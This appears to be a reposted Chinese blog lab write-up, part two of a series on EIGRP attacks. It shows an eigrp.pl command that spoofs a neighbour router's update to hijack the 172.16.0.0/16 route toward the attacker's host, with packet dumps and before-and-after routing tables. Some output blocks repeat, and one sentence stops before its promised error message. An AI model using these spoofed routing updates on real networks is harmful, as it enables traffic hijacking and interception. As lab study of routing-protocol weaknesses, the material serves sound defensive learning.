Eigrp恶意插入路由和致瘫攻击测试(二)
三、插入恶意路由
首先来回顾下eigrp的特性,eigrp在设计DUAL算法时,为了最大限度的节省动态路由占用网络的带宽,不采用链路状态协议的实时更新算法,即定期告知周知路由信息,而是采用触发更新的方式,在本机路由遭到变化时,仅将变化的路由通告,也就是指,在邻居hello信息存活的情况下,我们的R0将始终保持住攻击方压入他的一条恶意路由,直到R1的hello出现问题,才重新协商。
1、我们首先看下正常情况下两机路由:
R0#sh ip route
Gateway of last resort is not set
D 172.16.0.0/16 [90/307200] via 192.168.1.249, 20:55:19, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R1#sh ip route
Gateway of last resort is not set
172.16.0.0/16 is variably subnetted, 2 subnets, 2 masks
C 172.16.0.0/24 is directly connected, FastEthernet0/1
D 172.16.0.0/16 is a summary, 21:14:43, Null0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
C 172.16.0.0/24 is directly connected, FastEthernet0/1
D 172.16.0.0/16 is a summary, 21:14:43, Null0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R0收到R1的一条通告,因为R1上有直连的172.16网络。
2、接下来攻击方发送恶意路由信息:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 192.168.1.36
这里,update表示发送更新,internal表示插入标记为eigrp内部的路由通告,source伪造发送更新的路由器,routedest要插入的路由,nexthop插入路由的下一条地址。
水煮豆豆注:要非常注意的一个问题:攻击方采用的perl脚本环境里面的RawIP.pm有个严谨的网络地址检测机制,即网络设置中,主机地址和网关不在一个掩码内,或者不存在网关,都将导致错误如下:
首先看下效果:
嗅探发送的出的恶意路由数据:
***************************************************************
Source MAC:000c29c57e29 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0
a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00
Version: 2
Opcode:01 <Update>
Checksum: 0x17e <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 28
Next hop: 192.168.1.36
Delay: 12000 Bandwidth: 256
MTU: 1514 Hop count: 1
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16.0.
Source MAC:000c29c57e29 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0
a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00
Version: 2
Opcode:01 <Update>
Checksum: 0x17e <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 28
Next hop: 192.168.1.36
Delay: 12000 Bandwidth: 256
MTU: 1514 Hop count: 1
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16.0.
恶意路由发送出的是一条eigrp update数据。
然后检查路由器R0:
R0#sh ip route
Gateway of last resort is 192.168.1.36 to network 0.0.0.0
D 172.16.0.0/16 [90/293600] via 192.168.1.36, 00:00:17, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.36, 00:00:17, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.36, 00:00:17, FastEthernet0/0
我们看到原本指向249的路由现在指向了36。即我们的攻击方,R0现在将172.16网段的数据发向我们了。
在249这个邻居保持在线的前提下,R0将始终保持这条路由直到邻居失效。
现在问题来了,作为一个内部插入路由,为什么出现了一条指向36的默认路由??
引申研究:为什么会多插入默认路由?
我们对比下正常的来自R1的更新数据:
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00
00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10
Version: 2
Opcode:01 <Update>
Checksum: 0xb4ac <* Correct *>
Flags: 10 Sequnce :114
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 27
Next hop: 0.0.0.0
Delay: 25600 Bandwidth: 256000
MTU: 1500 Hop count: 0
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16..
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00
00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10
Version: 2
Opcode:01 <Update>
Checksum: 0xb4ac <* Correct *>
Flags: 10 Sequnce :114
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 27
Next hop: 0.0.0.0
Delay: 25600 Bandwidth: 256000
MTU: 1500 Hop count: 0
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16..
貌似正常的更新和我们伪造的更新相比差别就在此处,那为什么这个差别会造成,正常的更新没有插入默认路由,而伪造的却插入了呢?我们将伪造的nexthop地址也做修改:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 0.0.0.0
在修改nexthop参数的情况下,结果变成:
D 172.16.0.0/16 [90/293600] via 192.168.1.249, 00:00:02, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.249, 00:00:02, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.249, 00:00:02, FastEthernet0/0
可以看到默认路由仍然存在,但是指向的源由36变成了249,研判在0.0.0.0和192.168.1.36;192.168.1.249的比较中,默认采用了最大地址的算法?
本文转自 beansprouts 51CTO博客,原文链接:http://blog.51cto.com/netwalk/128211
,如需转载请自行联系原作者
